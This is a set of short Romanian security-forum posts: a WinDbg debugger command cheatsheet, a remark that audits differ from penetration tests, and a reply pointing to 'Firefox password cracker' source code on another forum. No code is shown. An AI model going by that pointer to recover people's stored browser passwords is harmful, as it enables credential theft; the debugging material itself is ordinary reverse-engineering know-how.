/ 16 - Change number base x kernel32!Load* - Examine symbols ln addr - List nearest symbols k - Stack kd - Raw stack kb - Stack with firts 3 params r - Show registers r eax,ebx - Show some registers r ecx=0 - Set register value dt ntdll!_PEB - Display type dv - Display local variables da, du - Display ASCII/Unicode memory db, dw, dd, dq, df - Display byte/word/dword/qword/float memory db*, dd* - Display dereferenced memory eb, ew, ed, eq, ef - Edit byte/word/dword/qword/float memory c, m, f - Compare, move, fill memory s Addr Size Data - Search data bl - List breakpoints bc * - Clear all breakpoints be / bd - Enable/disable breakpoints bp Addr - Add breakpoint bm Sym - Add breakpoint on symbol ba [rwx] Addr - Break on access bp mod!addr /1 - Only once bp mod!addr k - Only triggered after k-1 passes Poate i se mai pare cuiva utila. Mai multe comenzi: http://windbg.info/doc/1-common-cmds.html Un mic cheatsheet: https://labs.snort.org/awbo/windbg.txt

Audit != Pentest Audit: Audit - Wikipedia (zis si AUDIT FINANCIAR) Pentest: Penetration test - Wikipedia, the free encyclopedia Nu mai faceti confuzie!

Unele intrebari sunt penibile. Rau de tot. Altele au raspunsuri gresite.

Vezi aici: Firefox password cracker - clean code - Source Codes - rohitab.com - Forums Daca ai intrebari, spune.